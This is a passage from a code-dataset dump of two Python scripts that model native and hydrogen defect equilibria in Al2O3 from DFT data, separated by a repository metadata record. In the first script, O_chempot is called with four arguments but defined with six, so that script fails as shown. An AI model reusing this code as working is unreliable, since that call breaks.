((DOS[i,1] + DOS[i,2]) * m.exp(-(Ef + E_VBM - DOS[i,0])/(k * T)))/(1 + m.exp(-(Ef + E_VBM - DOS[i,0])/(k * T)))\n for i in range(0, VBM_line): \n conc_holes = conc_holes + ((DOS[i+1,0] - DOS[i,0]) * (func[i+1] + func[i])) #trapezoidal method\n conc_holes = conc_holes/2\n return conc_holes\n# returns the concentration of conduction band electrons when Fermi level=Ef\ndef trapz_electrons(rows_DOS, CBM_line, DOS, Ef, E_VBM): \n CB = np.empty((rows_DOS - CBM_line, 5),dtype=float)\n conc_electrons = 0\n CB = DOS[CBM_line:(rows_DOS), 0:6]\n func = np.empty((CB[:,0].size, 1), dtype=float)\n for i in range(0, CB[:,0].size): \n func[i] = (CB[i,1] + CB[i,2])/(1 + m.exp((CB[i,0] - Ef - E_VBM)/(k * T)))\n 
for i in range(0, CB[:,0].size-1): \n conc_electrons = conc_electrons + ((CB[i+1,0] - CB[i,0]) * (func[i+1] + func[i])) #trapezoidal method\n conc_electrons = conc_electrons/2\n return conc_electrons\n\"\"\"\n****************TO FIND DEFECT CONCENTRATIONS AT A GIVEN pO2*******************\n\"\"\"\n\"\"\"\nTo find chemical potentials\n\"\"\"\n# returning chemical potentials of O and Al over pO2 range: 1e-45 atm to 1 atm\n# uAl=EDFT_Al @ pO2=6.5e-42 atm, hence this limit\ndef O_chempot(DFTE_O2, E_over, u0_O2, k, T, p0):\n p = np.empty((46,1), dtype=float)\n u_O = np.empty((46,1), dtype=float) \n for i in range(0,46): \n p[i] = m.pow(10,-(45-i))\n u_O[i] = (1/2) * (DFTE_O2 + E_over + u0_O2 + (k * T * m.log(p[i]/p0)))\n return u_O\ndef Al_chempot(DFTE_Al2O3, u_O):\n u_Al = np.empty((46,1),dtype=float) \n for i in range(0,46): \n u_Al[i] = (DFTE_Al2O3 - (3 * u_O[i]))/2\n return u_Al \n\"\"\"\nTo find defect formation energies at a given pO2\n\"\"\"\n# returns vector of formation energies of various defects at a given pO2, Fermi level Ef\ndef formn_E(KV, E_perf, u_O, u_Al, E_VBM, Ef):\n delE = np.empty((14,1),dtype=float)\n for i in range(0,14): #change!\n delE[i] = KV[i,4] - E_perf - (KV[i,2] * u_O) - (KV[i,3] * u_Al) + (KV[i,1] * (E_VBM + Ef)) + KV[i,6] \n return delE\n\"\"\"\nTo find defect concentrations at a given pO2 using Boltzmann approx\n\"\"\"\n# returns concentration of oxygen vacancies (all charge states)\ndef conc_VO(KV, delE, k, T):\n nD = KV[0:3,[5]] #N_site*N_config\n delEVO = delE[0:3] #copying formnE of VO from delE\n VO = np.empty((3,1),dtype=float)\n for i in range (0,3): \n VO[i] = nD[i] * np.exp(-delEVO[i]/(k * T))\n return VO \n# returns concentration of aluminum vacancies (all charge states)\ndef conc_VAl(KV, delE, k, T):\n nD = KV[3:7,[5]] #N_site*N_config\n delEVAl = delE[3:7] #copying formnE of VAl from delE\n VAl = np.empty((4,1),dtype=float)\n for i in range (0,4): \n VAl[i] = nD[i] * np.exp(-delEVAl[i]/(k * T))\n return VAl\n# returns 
concentration of oxygen interstitials (all charge states)\ndef conc_IO(KV, delE, k, T):\n nD = KV[7:10,[5]] #N_site*N_config\n delEIO = delE[7:10] #copying formnE of IO from delE\n IO = np.empty((3,1),dtype=float)\n for i in range (0,3): \n IO[i] = nD[i] * np.exp(-delEIO[i]/(k * T))\n return IO \n# returns concentration of aluminum interstitials (all charge states)\ndef conc_IAl(KV, delE, k, T):\n nD = KV[10:14,[5]] #N_site*N_config\n delEIAl = delE[10:14] #copying formnE of IAl from delE\n IAl = np.empty((4,1),dtype=float)\n for i in range (0,4): \n IAl[i] = nD[i] * np.exp(-delEIAl[i]/(k * T))\n return IAl\n\"\"\"\n**************************BISECTION METHOD*************************************\n\"\"\"\ndef samesign(fa, fb):\n return fa*fb>0\n# calculates the value of the charge-neutrality function at given pO2 by \n# calculating the electronic and ionic defect concentrations at Ef \ndef neut_fn(VBM_line, DOS, Ef, E_VBM, rows_DOS, CBM_line, KV, E_perf, u_O, u_Al, k, T):\n conc_holes = trapz_holes(VBM_line, DOS, Ef, E_VBM) \n conc_electrons = trapz_electrons(rows_DOS, CBM_line, DOS, Ef, E_VBM) \n delE = formn_E(KV, E_perf, u_O, u_Al, E_VBM, Ef) \n VO = conc_VO(KV, delE, k, T) \n VAl = conc_VAl(KV, delE, k, T) \n IO = conc_IO(KV, delE, k, T) \n IAl = conc_IAl(KV, delE, k, T) \n q_VO = KV[0:3,[1]] \n q_VAl = KV[3:7,[1]] \n q_IO = KV[7:10,[1]] \n q_IAl = KV[10:14,[1]] \n qVO = np.empty((3,1),dtype=float) \n qVAl = np.empty((4,1),dtype=float) \n qIO = np.empty((3,1),dtype=float) \n qIAl = np.empty((4,1),dtype=float) \n for i in range(0,3):\n qVO[i] = q_VO[i] * VO[i]\n for i in range(0,4):\n qVAl[i] = q_VAl[i] * VAl[i]\n for i in range(0,3):\n qIO[i] = q_IO[i] * IO[i]\n for i in range(0,4):\n qIAl[i] = q_IAl[i] * IAl[i] \n sum_qD = sum(qVO) + sum(qVAl) + sum(qIO) + sum(qIAl)\n f = sum_qD + conc_holes - conc_electrons\n return f\n# this function calculates the Ef that solves the neutrality equation at a given pO2 \ndef bisection(VBM_line, DOS, Efa, Efb, E_VBM, rows_DOS, 
CBM_line, KV, E_perf, u_O, u_Al, k, T):\n fa = neut_fn(VBM_line, DOS, Efa, E_VBM, rows_DOS, CBM_line, KV, E_perf, u_O, u_Al, k, T)\n fb = neut_fn(VBM_line, DOS, Efb, E_VBM, rows_DOS, CBM_line, KV, E_perf, u_O, u_Al, k, T)\n assert not samesign(fa,fb)\n while Efb - Efa > 1e-10:\n Efc = (Efa + Efb)/2\n fc = neut_fn(VBM_line, DOS, Efc, E_VBM, rows_DOS, CBM_line, KV, E_perf, u_O, u_Al, k, T)\n if samesign(fa,fc):\n Efa = Efc\n elif samesign(fb,fc):\n Efb = Efc\n return Efc \n\"\"\"\n************************FINAL Ef AND DEFECT CONCENTRATIONS*********************\n\"\"\"\n# this function uses bisection method to calculate f,Ef and [D] at various pO2 \ndef final_f_Ef_conc(VBM_line, DOS, Efa, Efb, E_VBM, rows_DOS, CBM_line, KV, E_perf, u_O, u_Al, k, T):\n f = np.empty((46,1),dtype=float) # to check value of neutrality equation using final Ef\n Ef = np.empty((46,1),dtype=float)\n delE = np.empty((14,46),dtype=float)\n final_h = np.empty((46,1),dtype=float)\n final_e = np.empty((46,1),dtype=float)\n final_VO = np.empty((3,46),dtype=float)\n final_VAl = np.empty((4,46),dtype=float)\n final_IO = np.empty((3,46),dtype=float)\n final_IAl = np.empty((4,46),dtype=float)\n for i in range(0,46):\n Ef[i] = bisection(VBM_line, DOS, Efa, Efb, E_VBM, rows_DOS, CBM_line, KV, E_perf, u_O[i], u_Al[i], k, T)\n f[i] = neut_fn(VBM_line, DOS, Ef[i], E_VBM, rows_DOS, CBM_line, KV, E_perf, u_O[i], u_Al[i], k, T)\n delE[:,[i]] = formn_E(KV, E_perf, u_O[i], u_Al[i], E_VBM, Ef[i])\n final_h[i] = trapz_holes(VBM_line, DOS, Ef[i], E_VBM)\n final_e[i] = trapz_electrons(rows_DOS, CBM_line, DOS, Ef[i], E_VBM)\n final_VO[:,[i]] = conc_VO(KV, delE[:,[i]], k, T)\n final_VAl[:,[i]] = conc_VAl(KV, delE[:,[i]], k, T)\n final_IO[:,[i]] = conc_IO(KV, delE[:,[i]], k, T)\n final_IAl[:,[i]] = conc_IAl(KV, delE[:,[i]], k, T)\n return (final_VO,final_VAl,final_IO,final_IAl,final_h,final_e,f,Ef,delE)\n \n\"\"\"\n****************************MAIN BODY******************************************\n\"\"\"\nDOS = 
np.loadtxt(\"dosperfect.txt\") # DOS from VASP\nDOS[:,1] = DOS[:,1]/24 # spin-up DOS per formula unit of Al2O3\nDOS[:,2] = DOS[:,2]/24 # spin-down DOS per formula unit of Al2O3\nKV = np.loadtxt(\"native_data.txt\",skiprows=1) # array of the defect supercell data\n# defining constants\nk = 8.6173303e-05 # Boltzmann constant in eV\nE_VBM = 5.795 # Valence band maximum in eV from VASP DOS\nE_CBM = 11.638 # Conduction band minimum in eV from VASP DOS\nrows_DOS = len(DOS) # number of rows in the array DOS\n# Ef ranges from 0 to Eg in eV\nEfa = 0\nEfb = 5.84\nVBM_line = find_VBM(rows_DOS, E_VBM)\nCBM_line = find_CBM(rows_DOS, E_CBM)\n# defining constants to calculate chemical potentials \nDFTE_Al2O3 = -37.4057 # DFT energy of Al2O3(s) per f.u. in eV\nDFTE_O2 = -9.8591 # DFT energy of O2(g) in eV\nE_perf = -897.74454 # DFT energy in eV of perfect supercell of Al2O3\nE_over = 1.36 # O2 GGA overbinding correction\nu0_O2 = -2.4534 # at 1100 K (Temperature correction to u_O)\np0 = 1 # standard pressure in atm\nT = 1100 # temperature at which KV diagram plotted in K\n# calculating chemical potentials\nu_O = O_chempot(DFTE_O2, E_over, u0_O2, p0)\nu_Al = Al_chempot(DFTE_Al2O3, u_O)\n# calculating all final defect concentrations at all pO2 by using bisection method to solve\n# charge-neutrality equation \nfunc = final_f_Ef_conc(VBM_line, DOS, Efa, Efb, E_VBM, rows_DOS, CBM_line, KV, E_perf, u_O, u_Al, k, T)\nfinalVO = func[0]\nfinalVAl = func[1]\nfinalIO = func[2]\nfinalIAl = func[3]\nfinalh = func[4]\nfinale = func[5]\nf = func[6]\nEf = func[7]\ndelE = func[8]\np = np.array([[1e-45,1e-44,1e-43,1e-42,1e-41,1e-40,1e-39,\n 1e-38,1e-37,1e-36,1e-35,1e-34,1e-33,1e-32,1e-31,1e-30,1e-29,1e-28,\n 1e-27,1e-26,1e-25,1e-24,1e-23,1e-22,1e-21,1e-20,1e-19,1e-18,1e-17,\n 1e-16,1e-15,1e-14,1e-13,1e-12,1e-11,1e-10,1e-09,1e-08,1e-07,1e-06,\n 1e-05,1e-04,1e-03,1e-02,1e-01,1]])\nlogp = np.log10(p)\nlogVO = np.log10(finalVO)\nlogVAl = np.log10(finalVAl)\nlogIO = np.log10(finalIO)\nlogIAl = 
np.log10(finalIAl)\nlogh = np.log10(finalh)\nloge = np.log10(finale)\n#plt.figure(figsize=(8,6))\n#plt.figure(figsize=(3.84,2.95))\naxes = plt.gca()\naxes.set_xlim([-45,0])\naxes.set_ylim([-16,-4]) \nfont = {'fontname':'Times New Roman','fontsize':7}\nplt.xlabel('logpO2 (atm)',**font)\nplt.ylabel('log[D] per f.u. Al2O3',**font)\nplt.plot(logp[0,:],logVO[0,:],color='#1b9e77',marker='.',label='VOx')\nplt.plot(logp[0,:],logVO[1,:],color='#1b9e77',marker='*',label='VO+1')\nplt.plot(logp[0,:],logVO[2,:],color='#1b9e77',marker='p',label='VO+2')\nplt.plot(logp[0,:],logVAl[0,:],color='#d95f02',marker='P',label='VAlx')\nplt.plot(logp[0,:],logVAl[1,:],color='#d95f02',marker='+',label='VAl-1')\nplt.plot(logp[0,:],logVAl[2,:],color='#d95f02',marker='x',label='VAl-2')\nplt.plot(logp[0,:],logVAl[3,:],color='#d95f02',marker='o',label='VAl-3')\nplt.plot(logp[0,:],logIO[0,:],color='#7570b3',marker='X',label='IOx')\nplt.plot(logp[0,:],logIO[1,:],color='#7570b3',marker='h',label='IO-1')\nplt.plot(logp[0,:],logIO[2,:],color='#7570b3',marker='H',label='IO-2')\nplt.plot(logp[0,:],logIAl[0,:],color='#e7298a',marker='d',label='IAlx')\nplt.plot(logp[0,:],logIAl[1,:],color='#e7298a',marker='D',label='IAl+1')\nplt.plot(logp[0,:],logIAl[2,:],color='#e7298a',marker='s',label='IAl+2')\nplt.plot(logp[0,:],logIAl[3,:],color='#e7298a',marker='^',label='IAl+3')\nplt.plot(logp[0,:],logh[:,0],color='#66a61e',marker='>',label='h')\nplt.plot(logp[0,:],loge[:,0],color='#e6ab02',marker='<',label='e')\npylab.legend(loc='upper left')\npylab.savefig('native_1100K.png')\n" }, { "alpha_fraction": 0.5380898714065552, "alphanum_fraction": 0.6023481488227844, "avg_line_length": 48.990970611572266, "blob_id": "62c8d6bfdca96111df0fac3adeb24bc645df9ac0", "content_id": "c471c257bec47cd85050e7ce7a8b06fb46ef66ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22145, "license_type": "no_license", "max_line_length": 139, "num_lines": 443, "path": "/hydrogen 
defect equilibria/KVD_hydrogen_defect_equilibria.py", "repo_name": "vrindaasomjit/Defect-equilibria", "src_encoding": "UTF-8", "text": "import numpy as np\nimport math as m\nimport matplotlib.pyplot as plt\nfrom mpmath import * # for adjusting precision\nimport pylab\n\"\"\"\n*****************TO FIND CONCENTRATION OF ELECTRONIC DEFECTS*******************\n\"\"\"\n\"\"\"\nTo find VBM and CBM row numbers\n\"\"\"\n# finds the VBM and returns its row number\ndef find_VBM(rows_DOS, E_VBM): \n for i in range(0, rows_DOS): \n if DOS[i,0] == E_VBM: #first column of DOS has the energy\n VBM_line = i\n return VBM_line\n# finds the CBM and returns its row number\ndef find_CBM(rows_DOS, E_CBM): \n for i in range(0, rows_DOS): \n if DOS[i,0] == E_CBM: #first column of DOS has the energy\n CBM_line = i\n return CBM_line\n\n\"\"\"\nTrapezoidal method to find concentration of electronic defects by using the Fermi-Dirac distribution\nand integrating over density of states\nEf is calculated assuming E_VBM is the reference level, therefore E_VBM term included in the F-D distribution\n\"\"\"\n# returns the concentration of valence band holes when Fermi level=Ef\ndef trapz_holes(VBM_line, DOS, Ef, E_VBM): \n conc_holes = 0\n func = np.empty((VBM_line+1, 1), dtype=float) \n for i in range(0, VBM_line+1): \n func[i] = ((DOS[i,1] + DOS[i,2]) * m.exp(-(Ef + E_VBM - DOS[i,0])/(k * T)))/(1 + m.exp(-(Ef + E_VBM - DOS[i,0])/(k * T)))\n for i in range(0, VBM_line): \n conc_holes = conc_holes + ((DOS[i+1,0] - DOS[i,0]) * (func[i+1] + func[i])) #trapezoidal method\n conc_holes = conc_holes/2\n return conc_holes\n# returns the concentration of conduction band electrons when Fermi level=Ef\ndef trapz_electrons(rows_DOS, CBM_line, DOS, Ef, E_VBM): \n CB = np.empty((rows_DOS - CBM_line, 5),dtype=float)\n conc_electrons = 0\n CB = DOS[CBM_line:(rows_DOS), 0:6]\n func = np.empty((CB[:,0].size, 1), dtype=float)\n for i in range(0, CB[:,0].size): \n func[i] = (CB[i,1] + CB[i,2])/(1 + m.exp((CB[i,0] - Ef 
- E_VBM)/(k * T)))\n for i in range(0, CB[:,0].size-1): \n conc_electrons = conc_electrons + ((CB[i+1,0] - CB[i,0]) * (func[i+1] + func[i])) #trapezoidal method\n conc_electrons = conc_electrons/2\n return conc_electrons\n\"\"\"\n****************TO FIND DEFECT CONCENTRATIONS AT A GIVEN pH2*******************\n\"\"\"\n\"\"\"\nTo find chemical potentials\n\"\"\"\n# over pH2=1e-15 to 1 atm\n# including even lower values of pH2 will not make a difference, since T is so low\ndef H_chempot(lim, DFTE_H2, u0_H2, k, T, p0):\n pH2 = np.empty((lim,1),dtype=float) \n u_H = np.empty((lim,1),dtype=float) \n for i in range(0,lim): \n pH2[i] = m.pow(10,-(lim-1-i))\n u_H[i] = (1/2) * (DFTE_H2 + u0_H2 + (k * T * m.log(pH2[i]/p0))) \n return u_H\n\"\"\"\nTo find defect formation energies at a given pH2\n\"\"\"\n# formation E of isolated H defects; order Hi-1,Hi0,Hi+1\ndef formn_E(KV_Hi, E_perf, u_H, E_VBM, Ef):\n delE=np.empty((3,1),dtype=float) \n for i in range(0,3): \n delE[i]=KV_Hi[i,5] - E_perf - (KV_Hi[i,4]*u_H) + (KV_Hi[i,1] * (E_VBM+Ef)) + KV_Hi[i,7] \n return delE\n# reading fixed native defect concentrations, at each charge state\ndef conc_VO_fix(fixednative):\n VO_fix = fixednative[0:3,[5]] # q=0,1,2\n return VO_fix\ndef conc_VAl_fix(fixednative):\n VAl_fix = fixednative[3:7,[5]] # q=0,-1,-2,-3\n return VAl_fix\ndef conc_IO_fix(fixednative):\n IO = fixednative[7:10,[5]] # q=0,-1,-2\n return IO\ndef conc_IAl_fix(fixednative):\n IAl = fixednative[10:14,[5]] # q=0,1,2,3\n return IAl\n# calculating concentrations of isolated H defects using Boltzmann approx.\ndef conc_IH_eq(KV_Hi, delE, k, T):\n nD = KV_Hi[0:3,[6]] #N_site*N_config\n IH_eq = np.empty((3,1),dtype=float)\n for i in range(0,3):\n IH_eq[i] = nD[i] * np.exp(-delE[i]/(k * T)) # q=-1,0,1\n return IH_eq \n# calculating concentrations of H defect complexes from fixed native defect conc\n# and equilibrium isolated H defect conc\n# only those complexes w/ positive Eb and realizable charge considered\n# Supplementary Info 
has detailed derivation\ndef conc_VOH(delE, BE, fixednative, KV_Hi, VO_fix, k, T):\n IH_eq = conc_IH_eq(KV_Hi, delE, k, T) #3x1 q=-1,0,1\n VOH = np.empty((2,1),dtype=float) #q=0,1\n Eb = BE[0:2,[11]] #0,1\n Nconf_VOH = BE[0:2,[10]] #0,1\n Nconf_VO = fixednative[0:3,[4]] #q=0,1,2\n nD_Hi = KV_Hi[0:3,[6]] #-1,0,1\n # first calculating all the configuration-related prefactors\n X0 = Nconf_VOH[0]/(Nconf_VO[1] * nD_Hi[0]) #VOH0=VO+1,Hi-1\n X1 = Nconf_VOH[1]/(Nconf_VO[0] * nD_Hi[2]) #VOH+1=VO0,Hi+1\n IH_eq0 = IH_eq[0]; IH_eq2 = IH_eq[2]; Eb0 = Eb[0]; Eb1 = Eb[1]\n mp.dps = 250\n IH_eq0 = mpf(IH_eq0[0]); IH_eq2 = mpf(IH_eq2[0]); Eb0 = mpf(Eb0[0]); Eb1 = mpf(Eb1[0]);\n VOH[0] = (VO_fix[1] * IH_eq0)/(IH_eq0 + ((1/X0) * m.exp(-Eb0/(k * T)))) #VOH0=VO+1,Hi-1\n VOH[1] = (VO_fix[0] * IH_eq2)/(IH_eq2 + ((1/X1) * m.exp(-Eb1/(k * T)))) #VOHp1=VO0,Hi+1\n return VOH\ndef conc_VAlH(delE, BE, fixednative, KV_Hi, VAl_fix, k, T):\n IH_eq = conc_IH_eq(KV_Hi, delE, k, T) #3x1 q=-1,0,1\n VAlH = np.empty((9,1),dtype=float) #q=-3,-2,-1,0,1; -1,0,1,2->VAlxH\n Eb = BE[2:11,[11]] #q=-3,-2,-1,0,1; -1,0,1,2->VAlxH\n Nconf_VAlH = BE[2:11,[10]] #q=-3,-2,-1,0,1; -1,0,1,2->VAlxH\n Nconf_VAl = fixednative[3:7,[4]] #q=0,-1,-2,-3\n nD_Hi = KV_Hi[0:3,[6]] #q=-1,0,+1\n # first calculating all the configuration-related prefactors\n X0 = Nconf_VAlH[0]/(Nconf_VAl[2] * nD_Hi[0]) #VAlHm3=VAl-2,Hi-1\n X1 = Nconf_VAlH[1]/(Nconf_VAl[3] * nD_Hi[2]) #VAlHm2=VAl-3,Hi+1\n X2 = Nconf_VAlH[2]/(Nconf_VAl[2] * nD_Hi[2]) #VAlHm1=VAl-2,Hi+1\n X3 = Nconf_VAlH[3]/(Nconf_VAl[1] * nD_Hi[2]) #VAlHm0=VAl-1,Hi+1\n X4 = Nconf_VAlH[4]/(Nconf_VAl[0] * nD_Hi[2]) #VAlHp1=VAl0,Hi+1 \n X5 = Nconf_VAlH[5]/(Nconf_VAl[3] * (nD_Hi[2] ** 2)) #VAl2Hm1=VAl-3,2*Hi+1\n X6 = Nconf_VAlH[6]/(Nconf_VAl[3] * (nD_Hi[2] ** 3)) #VAl3Hx=VAl-3,3*Hi+1\n X7 = Nconf_VAlH[7]/(Nconf_VAl[3] * (nD_Hi[2] ** 4)) #VAl4Hp1=VAl-3,4*Hi+1\n X8 = Nconf_VAlH[8]/(Nconf_VAl[3] * (nD_Hi[2] ** 5)) #VAl5Hp2=VAl-3,5*Hi+1\n # calculating the sum of 
NVAlHm2,NVAl2Hm1,NVAl3Hx,NVAl4Hp1,NVAl5Hp2 \n mult1 = IH_eq[2] * X1 * m.exp(Eb[1]/(k*T))\n mult5 = (IH_eq[2] ** 2) * X5 * m.exp(Eb[5]/(k * T))\n mult6 = (IH_eq[2] ** 3) * X6 * m.exp(Eb[6]/(k * T))\n mult7 = (IH_eq[2] ** 4) * X7 * m.exp(Eb[7]/(k * T))\n mult8 = (IH_eq[2] ** 5) * X8 * m.exp(Eb[8]/(k * T))\n mp.dps = 250 #setting precision to 250 decimal points\n mult1 = mpf(mult1[0]); mult5 = mpf(mult5[0]); mult6 = mpf(mult6[0])\n mult7 = mpf(mult7[0]); mult8 = mpf(mult8[0]) #changing the precision\n summed=VAl_fix[3] * (mult1 + mult5 + mult6 + mult7 + mult8)/(1 + (mult1 + mult5 + mult6 + mult7 + mult8))\n # finding concentrations of VAlHm2,VAl2Hm1,VAl3Hx,VAl4Hp1,VAl5Hp2 analytically\n VAlH[1] = (VAl_fix[3] - summed) * IH_eq[2] * X1 * m.exp(Eb[1]/(k * T)) #VAlHm2=VAl-3,Hi+1\n VAlH[5] = (VAl_fix[3] - summed) * (IH_eq[2] ** 2) * X5 * m.exp(Eb[5]/(k * T)) #VAl2Hm1=VAl-3,2*Hi+1\n VAlH[6] = (VAl_fix[3] - summed) * (IH_eq[2] ** 3) * X6 * m.exp(Eb[6]/(k * T)) #VAl3Hx=VAl-3,3*Hi+1\n VAlH[7] = (VAl_fix[3] - summed) * (IH_eq[2] ** 4) * X7 * m.exp(Eb[7]/(k * T)) #VAl4Hp1=VAl-3,4*Hi+1\n VAlH[8] = (VAl_fix[3] - summed) * (IH_eq[2] ** 5) * X8 * m.exp(Eb[8]/(k * T)) #VAl5Hp2=VAl-3,5*Hi+1\n # next, defect complexes whose VAlq is not shared\n IH_eq2 = IH_eq[2]; Eb3 = Eb[3]; Eb4 = Eb[4]\n IH_eq2 = mpf(IH_eq2[0]); Eb3 = mpf(Eb3[0]); Eb4 = mpf(Eb4[0])\n VAlH[3] = (VAl_fix[1] * IH_eq2)/(IH_eq2 + ((1/X3) * m.exp(-Eb3/(k * T)))) #VAlH0=VAl-1,Hi+1\n VAlH[4] = (VAl_fix[0] * IH_eq2)/(IH_eq2 + ((1/X4) * m.exp(-Eb4/(k * T)))) #VAlHp1=VAl0,Hi+1 \n # calculating the sum of NVAlHm3,NVAlHm1 \n mult0 = IH_eq[0] * X0 * m.exp(Eb[0]/(k * T))\n mult2 = IH_eq[2] * X2 * m.exp(Eb[2]/(k * T))\n mult0 = mpf(mult0[0]); mult2 = mpf(mult2[0])\n summed2 = VAl_fix[2] * (mult0 + mult2)/(1 + (mult0 + mult2))\n # finding concentrations of VAlHm3,VAlHm1 analytically\n VAlH[0] = (VAl_fix[2] - summed2) * IH_eq[0] * X0 * m.exp(Eb[0]/(k * T)) #VAlHm3=VAl-2,Hi-1\n VAlH[2] = (VAl_fix[2] - summed2) * IH_eq[2] * X2 * 
m.exp(Eb[2]/(k * T)) #VAlHm1=VAl-2,Hi+1\n return VAlH\n\"\"\"\n**************************BISECTION METHOD*************************************\n\"\"\"\ndef samesign(fa,fb):\n return fa * fb > 0\n# calculates charge density at each u_H and fixed Ef\ndef neut_fn(VBM_line, DOS, Ef, E_VBM, rows_DOS, CBM_line, KV_Hi, E_perf, u_H, k, T, fixednative, KV_iso, KV_complex):\n conc_holes = trapz_holes(VBM_line, DOS, Ef, E_VBM) \n conc_electrons = trapz_electrons(rows_DOS, CBM_line, DOS, Ef, E_VBM) \n delE = formn_E(KV_Hi, E_perf, u_H, E_VBM, Ef) #3x1\n # fixed concentrations of native defects\n VO_fix = conc_VO_fix(fixednative) #3x1\n VAl_fix = conc_VAl_fix(fixednative) #4x1\n IO_fix = conc_IO_fix(fixednative) #3x1\n IAl_fix = conc_IAl_fix(fixednative) #4x1\n # equilibrium concentrations of H defects\n IH_eq = conc_IH_eq(KV_Hi, delE, k, T) #3x1\n # concentrations of H complexes\n VOH = conc_VOH(delE, BE, fixednative, KV_Hi, VO_fix, k, T) #2x1\n VAlH = conc_VAlH(delE, BE, fixednative, KV_Hi, VAl_fix, k, T) #9x1\n # charges\n q_VO = KV_iso[0:3,1] #3x1\n q_VAl = KV_iso[3:7,1] #4x1\n q_IO = KV_iso[7:10,1] #3x1\n q_IAl = KV_iso[10:14,1] #4x1\n q_IH = KV_iso[14:17,1] #3x1\n q_VOH = KV_complex[1:3,1] #2x1 #0,1\n q_VAlH = KV_complex[6:15,1] #9x1 #-3,-2,-1,0,1; -1,0,1,2->VAlxH\n VO = np.empty((3,1),dtype=float) #3x1\n VAl = np.empty((4,1),dtype=float) #4x1\n IO = np.empty((3,1),dtype=float) #3x1\n IAl = np.empty((4,1),dtype=float) #4x1 \n qVO = np.empty((3,1),dtype=float) #3x1\n qVAl = np.empty((4,1),dtype=float) #4x1\n qIO = np.empty((3,1),dtype=float) #3x1\n qIAl = np.empty((4,1),dtype=float) #4x1\n qIH_eq = np.empty((3,1),dtype=float) #3x1\n qVOH = np.empty((2,1),dtype=float) #2x1\n qVAlH = np.empty((9,1),dtype=float) #9x1\n # current concentrations; ordering: 0,1,2; 0,-1,-2,-3\n VO[0] = VO_fix[0] - VOH[1]\n VO[1] = VO_fix[1] - VOH[0]\n VO[2] = VO_fix[2]\n VAl[0] = VAl_fix[0] - VAlH[4]\n VAl[1] = VAl_fix[1] - VAlH[3]\n VAl[2] = VAl_fix[2] - VAlH[2] - VAlH[0]\n VAl[3] = VAl_fix[3] - 
VAlH[1] - VAlH[5] - VAlH[6] - VAlH[7] - VAlH[8] \n IO = IO_fix\n IAl = IAl_fix\n # charge*respective conc\n for i in range(0,3):\n qVO[i] = q_VO[i] * VO[i]\n for i in range(0,4):\n qVAl[i] = q_VAl[i] * VAl[i]\n for i in range(0,3):\n qIO[i] = q_IO[i] * IO[i]\n for i in range(0,4):\n qIAl[i] = q_IAl[i] * IAl[i]\n for i in range(0,3):\n qIH_eq[i] = q_IH[i] * IH_eq[i]\n for i in range(0,2):\n qVOH[i] = q_VOH[i] * VOH[i] \n for i in range(0,9):\n qVAlH[i] = q_VAlH[i] * VAlH[i]\n sum_qD = sum(qVO) + sum(qVAl) + sum(qIO) + sum(qIAl) + sum(qIH_eq) + sum(qVOH) + sum(qVAlH)\n f = sum_qD + conc_holes - conc_electrons \n return f\n# to solve for Ef that achieves charge neutrality\ndef bisection(VBM_line, DOS, Efa, Efb, E_VBM, rows_DOS, CBM_line, KV_Hi, E_perf, u_H, k, T, fixednative, KV_iso, KV_complex):\n fa = neut_fn(VBM_line, DOS, Efa, E_VBM, rows_DOS, CBM_line, KV_Hi, E_perf, u_H, k, T, fixednative, KV_iso, KV_complex)\n #print(fa)\n fb = neut_fn(VBM_line, DOS, Efb, E_VBM, rows_DOS, CBM_line, KV_Hi, E_perf, u_H, k, T, fixednative, KV_iso, KV_complex)\n #print(fb)\n assert not samesign(fa,fb)\n while Efb - Efa > 1e-14:\n Efc = (Efa + Efb)/2\n fc = neut_fn(VBM_line, DOS, Efc, E_VBM, rows_DOS, CBM_line, KV_Hi, E_perf, u_H, k, T, fixednative, KV_iso, KV_complex)\n if samesign(fa,fc):\n Efa = Efc\n elif samesign(fb,fc):\n Efb = Efc\n return Efc\n# evaluates everything across the pH2 range\ndef final_f_Ef_conc(lim, VBM_line, DOS, Efa, Efb, E_VBM, rows_DOS, CBM_line, KV_Hi, E_perf, u_H, k, T, fixednative, KV_iso, KV_complex):\n VO_fix = conc_VO_fix(fixednative) #3x1\n VAl_fix = conc_VAl_fix(fixednative) #4x1\n IO_fix = conc_IO_fix(fixednative) #3x1\n IAl_fix = conc_IAl_fix(fixednative) #3x1\n f = np.empty((lim,1),dtype=float) #to check value of neutrality equation using final Ef\n Ef = np.empty((lim,1),dtype=float)\n delE = np.empty((3,lim),dtype=float)\n final_h = np.empty((lim,1),dtype=float)\n final_e = np.empty((lim,1),dtype=float)\n final_VO = np.empty((3,lim),dtype=float) 
#current VO\n final_VAl = np.empty((4,lim),dtype=float) #current VAl\n final_IO = np.empty((3,lim),dtype=float)\n final_IAl = np.empty((4,lim),dtype=float)\n final_IH = np.empty((3,lim),dtype=float)\n final_VOH = np.empty((2,lim),dtype=float) \n final_VAlH = np.empty((9,lim),dtype=float)\n for i in range(0,lim):\n #print(u_H[i])\n Ef[i] = bisection(VBM_line, DOS, Efa, Efb, E_VBM, rows_DOS, CBM_line, KV_Hi, E_perf, u_H[i], k, T, fixednative, KV_iso, KV_complex)\n #print(Ef[i])\n delE[:,[i]] = formn_E(KV_Hi, E_perf, u_H[i], E_VBM, Ef[i])\n f[i] = neut_fn(VBM_line, DOS, Ef[i], E_VBM, rows_DOS, CBM_line, KV_Hi, E_perf, u_H[i], k, T, fixednative, KV_iso, KV_complex)\n final_h[i] = trapz_holes(VBM_line, DOS, Ef[i], E_VBM)\n final_e[i] = trapz_electrons(rows_DOS, CBM_line, DOS, Ef[i], E_VBM)\n final_IH[:,[i]] = conc_IH_eq(KV_Hi, delE[:,[i]], k, T)\n final_VAlH[:,[i]] = conc_VAlH(delE[:,[i]], BE, fixednative, KV_Hi, VAl_fix, k, T)\n final_VOH[:,[i]] = conc_VOH(delE[:,[i]], BE, fixednative, KV_Hi, VO_fix, k, T)\n final_VO[0,[i]] = VO_fix[0] - final_VOH[1,i]\n final_VO[1,[i]] = VO_fix[1] - final_VOH[0,i]\n final_VO[2,[i]] = VO_fix[2]\n final_VAl[0,[i]] = VAl_fix[0] - final_VAlH[4,i]\n final_VAl[1,[i]] = VAl_fix[1] - final_VAlH[3,i]\n final_VAl[2,[i]] = VAl_fix[2] - final_VAlH[2,i] - final_VAlH[0,i]\n final_VAl[3,[i]] = VAl_fix[3] - final_VAlH[1,i] - final_VAlH[5,i] - final_VAlH[6,i] - final_VAlH[7,i] - 